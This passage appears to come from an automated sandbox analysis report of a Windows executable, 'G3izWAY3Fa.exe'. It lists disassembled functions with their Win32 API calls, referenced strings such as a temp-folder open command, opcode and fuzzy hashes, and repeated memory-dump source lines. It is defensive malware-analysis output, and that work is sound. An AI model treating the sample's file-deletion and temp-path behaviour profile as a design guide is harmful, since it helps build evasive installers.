                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: C:\Windows\temp
                                • API String ID: 587946157-823764690
                                • Opcode ID: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                • Instruction ID: e1c53a3b58ef05eba024da23075f8ab054487d32240d7e587a4224b468346741
                                • Opcode Fuzzy Hash: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
                                • Instruction Fuzzy Hash: 87F0C872B04201AAC7516FB59D4AA5E2AA8AB41398F200637F510F61C1D9BD8841A658
                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                Download Yara Rule
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                • Instruction ID: 9357c62ddf9e7b3c824d0b87f8e4bad160879ee2cb8093492041203a2cf1b2c1
                                • Opcode Fuzzy Hash: 1c916d205157ad73d7dec8fa4d75793a4825b6d15c61c30e95467a340dd2df53
                                • Instruction Fuzzy Hash: A301F431724210ABE7295B389D04B2A36ADF710355F10427BF855F66F1D67CDC028B4D
                                Function 004056B4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                Function 00405695 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,004054A0,?,?,?), ref: 00405699
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                • Instruction ID: 6114cdacef20a61ffb1e354697c2a54f95ff97830a0005cd613603337fba2c3c
                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                Function 0040304E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                Function 00403080 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 0040308E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                Function 0040344C Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF,004032BC,00000000), ref: 00403457
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                • Instruction ID: 2202cf36b8f848177cc2ffd66234e305818bf21466fa1b02f98de814e748bada
                                • Opcode Fuzzy Hash: cd01773061dc76ed6dc42017c9b80e515b0b69eef6637a25064d86b5b90a4b84
                                • Instruction Fuzzy Hash: E5C0123060470096D6206F799E4F5063A18574073AB904326F1B5B40F2C77C5901893F

                                Non-executed Functions

                                Function 00404EB9 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404F18
                                • GetDlgItem.USER32(?,000003EE), ref: 00404F27
                                • GetClientRect.USER32(?,?), ref: 00404F64
                                • GetSystemMetrics.USER32(00000015), ref: 00404F6C
                                • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                • ShowWindow.USER32(?,00000008), ref: 00405008
                                • GetDlgItem.USER32(?,000003EC), ref: 00405029
                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                • GetDlgItem.USER32(?,000003F8), ref: 00404F36
                                  • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                • GetDlgItem.USER32(?,000003EC), ref: 0040507B
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004E4D,00000000), ref: 00405089
                                • CloseHandle.KERNEL32(00000000), ref: 00405090
                                • ShowWindow.USER32(00000000), ref: 004050B4
                                • ShowWindow.USER32(?,00000008), ref: 004050B9
                                • ShowWindow.USER32(00000008), ref: 00405100
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405132
                                • CreatePopupMenu.USER32 ref: 00405143
                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405158
                                • GetWindowRect.USER32(?,?), ref: 0040516B
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                • OpenClipboard.USER32(00000000), ref: 004051DA
                                • EmptyClipboard.USER32 ref: 004051E0
                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                • GlobalLock.KERNEL32(00000000), ref: 004051F3
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                • GlobalUnlock.KERNEL32(00000000), ref: 0040521F
                                • SetClipboardData.USER32(00000001,00000000), ref: 0040522A
                                • CloseClipboard.USER32 ref: 00405230
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID: {
                                • API String ID: 590372296-366298937
                                • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                Function 004046CA Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 004046E1
                                • GetDlgItem.USER32(?,00000408), ref: 004046EE
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 0040473A
                                • LoadBitmapA.USER32(0000006E), ref: 0040474D
                                • SetWindowLongA.USER32(?,000000FC,00404CCB), ref: 00404767
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040477B
                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 0040478F
                                • SendMessageA.USER32(?,00001109,00000002), ref: 004047A4
                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004047B0
                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004047C2
                                • DeleteObject.GDI32(?), ref: 004047C7
                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047F2
                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047FE
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404893
                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004048BE
                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048D2
                                • GetWindowLongA.USER32(?,000000F0), ref: 00404901
                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040490F
                                • ShowWindow.USER32(?,00000005), ref: 00404920
                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404A23
                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A88
                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A9D
                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404AC1
                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404AE7
                                • ImageList_Destroy.COMCTL32(?), ref: 00404AFC
                                • GlobalFree.KERNEL32(?), ref: 00404B0C
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B7C
                                • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404C25
                                • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C34
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C54
                                • ShowWindow.USER32(?,00000000), ref: 00404CA2
                                • GetDlgItem.USER32(?,000003FE), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404CB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                • String ID: $M$N
                                • API String ID: 1638840714-813528018
                                • Opcode ID: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                • Instruction ID: 1ebc4e1f5dd1db854d7f91ec63dfd1d34711f9484ded547680f267f962745bc2
                                • Opcode Fuzzy Hash: 2218f254bd768403f12b45b221eec84538c1d5bde26f6f708cdc4201c9d318c0
                                • Instruction Fuzzy Hash: 0802ADB0A00208EFDB20DF65DC45AAE7BB5FB84315F10817AF610BA2E1D7799A41CF58
                                Function 004041CD Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 00404219
                                • SetWindowTextA.USER32(?,?), ref: 00404246
                                • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                • lstrcmpiA.KERNEL32(open C:\Windows\temp\Edit9,00420478), ref: 00404338
                                • lstrcatA.KERNEL32(?,open C:\Windows\temp\Edit9), ref: 00404344
                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404354
                                  • Part of subcall function 00405282: GetDlgItemTextA.USER32(?,?,00000400,00404387), ref: 00405295
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                  • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                  • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                • SetDlgItemTextA.USER32(00000000,00000400,0041F430), ref: 004044A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                • String ID: A$C:\Windows\temp$open C:\Windows\temp\Edit9
                                • API String ID: 2246997448-1475063729
                                • Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                • Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                Function 00405302 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405320
                                • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040536A
                                • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 0040538B
                                • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405391
                                • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 004053A2
                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                • FindClose.KERNEL32(?), ref: 00405465
                                Strings
                                • "C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 0040530C
                                • \*.*, xrefs: 00405364
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
